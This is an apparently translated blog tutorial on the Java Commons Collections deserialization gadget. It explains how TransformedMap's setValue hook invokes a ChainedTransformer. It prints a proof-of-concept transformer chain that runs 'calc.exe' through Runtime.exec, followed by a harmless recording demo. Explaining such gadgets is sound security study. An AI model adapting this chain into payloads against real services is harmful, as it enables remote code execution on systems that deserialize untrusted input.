Java deserialization: how the TransformedMap class can execute malicious code

0x00 Code
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

Map map = new HashMap();
map.put("key", "value");
// call the toString method of the target object
String command = "calc.exe";
final String[] execArgs = new String[] { command };
final Transformer[] transformers = new Transformer[] {
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class },
                           new Object[] { "getRuntime", new Class[0] }),
    new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class },
                           new Object[] { null, new Object[0] }),
    new InvokerTransformer("exec", new Class[] { String.class }, execArgs)
};
Transformer transformer = new ChainedTransformer(transformers);
Map<String, Object> transformedMap = TransformedMap.decorate(map, null, transformer);
for (Map.Entry<String, Object> entry : transformedMap.entrySet()) {
    System.out.println(entry);
    entry.setValue("anything");   // this call runs the transformer chain
}
Execution Result:
0x01 Why can the TransformedMap class execute malicious code?
From the previous article (http://blog.51cto.com/13770310/2160737), we know that ChainedTransformer's transform method can execute malicious code.
The key to the above code is:
for (Map.Entry<String, Object> entry : transformedMap.entrySet()) {
    System.out.println(entry);
    entry.setValue("anything");
}
Why does calling entry.setValue("anything") lead to malicious code execution? Let's look at the checkSetValue method of the TransformedMap class:
/**
 * Override to transform the value when using <code>setValue</code>.
 *
 * @param value the value to transform
 * @return the transformed value
 * @since Commons Collections 3.1
 */
protected Object checkSetValue(Object value) {
    return valueTransformer.transform(value);
}
When setValue is called on an entry of a TransformedMap, the transform method of valueTransformer is invoked. If the valueTransformer that was passed in is a ChainedTransformer object, this inevitably results in malicious code execution.
Looking back at the code above:

So the core of the code is still the transform method of the ChainedTransformer that is used.
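To observe the hook described above without executing anything, here is an added example (not from the original post) that decorates a map with a harmless Transformer which only records its inputs; it assumes commons-collections 3.1 on the classpath and also shows that put() on the decorated map reaches the same transformer.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.map.TransformedMap;

// Added example: a harmless Transformer that records when it is invoked, so the
// TransformedMap hook can be observed without any code execution.
// Assumes commons-collections 3.1 (the version the article discusses) on the classpath.
public class TransformedMapHookDemo {

    /** Records every value handed to transform() and passes it through unchanged. */
    static final class RecordingTransformer implements Transformer {
        final List<Object> seen = new ArrayList<Object>();

        public Object transform(Object input) {
            seen.add(input);   // a ChainedTransformer would run its whole chain here
            return input;
        }
    }

    public static void main(String[] args) {
        RecordingTransformer valueTf = new RecordingTransformer();

        Map<String, Object> inner = new HashMap<String, Object>();
        inner.put("key", "value");   // put on the undecorated map: no hook involved

        // decorate() only wraps the map; existing entries are not transformed yet
        Map<String, Object> decorated = TransformedMap.decorate(inner, null, valueTf);
        System.out.println("after decorate: " + valueTf.seen);   // []

        // Entry.setValue on the decorated view -> checkSetValue -> valueTransformer.transform
        for (Map.Entry<String, Object> e : decorated.entrySet()) {
            e.setValue("anything");
        }
        System.out.println("after setValue: " + valueTf.seen);   // [anything]

        // put() on the decorated map also passes the value through the transformer
        decorated.put("other", "second");
        System.out.println("after put:      " + valueTf.seen);   // [anything, second]
    }
}
```

Swapping RecordingTransformer for the ChainedTransformer from the article is the only difference between this demo and the chain it explains, which is why the transformer passed to decorate() is the part worth inspecting.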